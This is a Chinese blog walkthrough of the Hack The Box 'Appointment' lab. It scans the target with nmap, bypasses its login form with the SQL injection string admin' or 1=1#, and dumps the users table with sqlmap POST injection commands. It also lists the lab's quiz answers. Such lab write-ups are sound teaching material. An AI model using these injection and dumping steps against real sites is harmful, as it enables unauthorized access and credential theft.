HTB_Appointment 靶机之登录框万能密码、sqlmap post 注入

已于 2023-02-08 13:34:59 修改
阅读量3.8k 收藏 6
点赞数 4
分类专栏: # startpoint 文章标签: 安全 sql
于 2022-04-22 15:26:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40927195/article/details/124346837
版权

⚔ 🧱 YOU NEED TO WALK BEFORE YOU CAN RUN 🧱⚔

文章目录

先放答案

因为这期问题都比较简单,简单到我想不到讲什么把它们串到一起,索性就直接放答案了

Structured Query Language
SQL Injection
personally identifiable information
A03:2021-Injection
Apache httpd 2.4.38 ((Debian))
443
brute-forcing
directory
404
dir
#

日常扫描,用一下上期学到的 -sV ,一个 web 站点

┌──(root💀kali)-[~]
└─# nmap -sV -v 10.129.94.47
80/tcp open  http    Apache httpd 2.4.38 ((Debian))

万能密码注入

SQL 注入这个东西我们在 pikachu 靶场里已经接触过了 👉 基于pikachu的漏洞学习(二)SQL 打开网站,一个登录框

在这里插入图片描述

尝试弱口令 admin/admin 失败,可以尝试万能密码注入

copy 一下登录的语句(之前 php 商城的登录语句,一般通用),这里并不需要有返回点,我们的目的是绕过登录判断

$query = "SELECT * FROM users WHERE `uemail`='$email' AND `upassword`='$pwd'";
$result = mysql_query($query);

构造语句

admin' or 1=1#

burp 抓包改一下

在这里插入图片描述

登录成功

在这里插入图片描述

sqlmap post 注入

sqlmap 是 sql 注入自动化神器,咱们今天只学一个,就是 post 的注入

保存我们的请求包为 sql.txt

在这里插入图片描述

测试是否存在注入

测试一下是否存在注入,-r 指定文件 -p 指定要测试的参数

┌──(root💀kali)-[~/document]
└─# sqlmap -r sql.txt -p username

在这里插入图片描述

查数据库

结果显示可以使用 time-based blind 时间盲注,查询数据库,使用 --dbs 参数

┌──(root💀kali)-[~/document]
└─# sqlmap -r sql.txt -p username --dbs

也是非常给力的,查询到两个数据库,时间盲注手工测试比较费时,建议用工具替代

在这里插入图片描述

查表

查询一下有什么表,information 表太多了,就看 appdb 的吧,使用 --tables参数,-D 指定数据库

┌──(root💀kali)-[~/document]
└─# sqlmap -r sql.txt -p username -D appdb --tables

在这里插入图片描述

查列

查看有什么列,使用 --columns 参数,使用 -T 指定表

┌──(root💀kali)-[~/document]
└─# sqlmap -r sql.txt -p username -D appdb -T users --columns

在这里插入图片描述

这个过程它的 Type 也是通过延时注入判断的

查数据

查看具体的数据使用 --dump,哦,这就是传说中的脱裤吧,-C 指定列名

┌──(root💀kali)-[~/document]
└─# sqlmap -r sql.txt -p username -D appdb -T users -C "password,username" --dump

查询到两个账号

在这里插入图片描述

我们尝试登录,成功!可以看到 flag

在这里插入图片描述

填入 flag ,pwn!

重返太空
关注
  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HTB_tools-开源
05-02
`HTB_tools-开源`是一款专为网络带宽管理设计的开源软件,它致力于简化网络环境中的上传和下载带宽分配的配置过程,同时提供了方便的监控功能。这款工具对于网络管理员来说尤其重要,因为它可以帮助他们高效地管理和...
htb_challenges:为我所有过于复杂的htb挑战完成内容转储
03-27
htb_challenges 为我所有过于复杂的htb挑战完成内容转储
用户登录页面--SQL注入
热门推荐
李书明(石家庄)的专栏
01-23 1万+
web网站攻击方式多种多样,sql注入是经常使用的攻击方向。攻击者把SQL命令插入到Web表单的输入域或页面请求的字符串,欺骗服务器执行恶意的SQL命令 SQL注入不是Web或数据库服务器中的缺陷,而是由于编程实践较差且缺乏经验而导致的。 动态拼接的SQL指令最易受攻击。 如登录时使用的SQL指令: $query = 'SELECT * from Users WHERE login = ' ...
系统安全实验——万能密码登录
IT_GIRL_XYX的博客
04-25 331
1、打开Firefox浏览器2、输入靶机Ip。
渗透测试中登录框骚操作总结(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Python_0011的博客
05-26 496
的时候,我们可以搜集这些用户名进行专门的弱口令爆破,例如我爆破出存在多个存在的用户名,首先搜集这些用户名,然后设置 burpsuite,通过以下格式的方法进行爆破,例如:Lihua,lihua123 lihua lihua lihua lihua@123 lihua lihua1234 且注意网站下方是否有建立时间,如果时间是 2017 年建站的 ,我们的密码可以设置成 lihua@2017 lihua@2018 等进行专门针对用户名的爆破。当然也遇到过比较奇葩的,直接就是中文为用户名。
sql注入
Leloz的博客
07-15 400
sql注入
网络安全|渗透测试入门案例分析,从零基础入门到精通—登录框页面的快速渗透常用检测手段
Jum的博客
06-21 1929
随着平台的多样性,用户需求的不断提高,为了方便用户通过一次性用户身份验证登录多个应用程序和网站,大多数平台都会使用 SSO 系统。在后端机制中,存在一个安全错误配置,它没有检查是否是为特定应用程序生成的 JWT 令牌——相反,它接受任何具有有效签名的 JWT 令牌。可以手动测试例如下面的一些高频弱口令,2.根据网站所使用的第三方组件,寻找特定的弱口令或默认口令进行登录。或者直接BP走一波。在网站后台登录的页面常用的渗透办法今天给大家分享一下,这样更好的让大家在日常维护网站的时候好注意在各个方便进行防御。
SQL注入原理-POST注入
T1ngSh0w的博客
09-17 4895
SQL注入原理-POST注入
Python库 | htb_cli-0.1.1-py3-none-any.whl
02-16
《Python库htb_cli-0.1.1-py3-none-any.whl详解及应用》 在Python的世界里,库是开发者的重要工具,它们提供了丰富的功能,极大地提升了开发效率。今天我们将聚焦于一个名为`htb_cli`的Python库,其版本为0.1.1,...
【HTB系列】靶机Chaos的渗透测试详解1
08-03
介绍靶机地址:10.10.10.120先用Nmap来进行探测Nmap scan report for 10.10.10.120Not shown: 994 cl
ROS_HTB_优先限速
09-07
ROS_HTB_优先限速,不错的脚本试试吧
SQL注入(万能密码)
qq_69432323的博客
03-14 5498
SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)
Hack The Box Starting Point 渗透测试入门靶场 TIER 1 - Appointment
Start C的博客
04-19 523
因为俺是一个学生,所以只打HTB免费的靶机。。。 这一关的类型是SQL相关。 TASK 1,SQL是什么?Structured query language,结构化查询语言。 TASK 2,一种最常见的SQL漏洞类型?以n结尾,很明显是SQL注入,即SQL Injection TASK 3,PII是什么?Personally Identifiable Information。 用户数据保护中的常用术语,搜索一下: 个人可识别信息(PII,Personally Identifiable Inform
利用sqlmap进行需要登录注入
qq_52358808的博客
09-01 1946
需要登录注入1.利用bp获取cookie2.利用sqlmap获取用户名密码 1.利用bp获取cookie 2.利用sqlmap获取用户名密码 cookie注入命令:sqlmap.py -u 注入点 --cookie=”获取的cookie” sqlmap.py -u http://127.0.0.1/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit --cookie=“security=low; PHPSESSID=9djnnv81n3lmgmu4sno9
vulnhub Monitoring: 1
箭雨镜屋
07-18 1030
渗透思路:nmap扫描 ---- 默认用户名+弱密码登录Nagios XI ---- 利用Nagios XI 5.6.5的RCE漏洞获得root的shell
[HTB靶场记录]TIER-1(上)
Madess的博客
05-03 523
Appointment靶机+Sequel靶机
登陆框post注入教程
weixin_33861800的博客
11-28 343
2019独角兽企业重金招聘Python工程师标准>>> ...
format htb
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios and practice their skills in a safe and controlled environment. The format of HTB typically involves a series of machines or challenges that users need to exploit to gain root access or find flags. Participants can use various tools and techniques to solve the challenges and improve their knowledge of cybersecurity.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值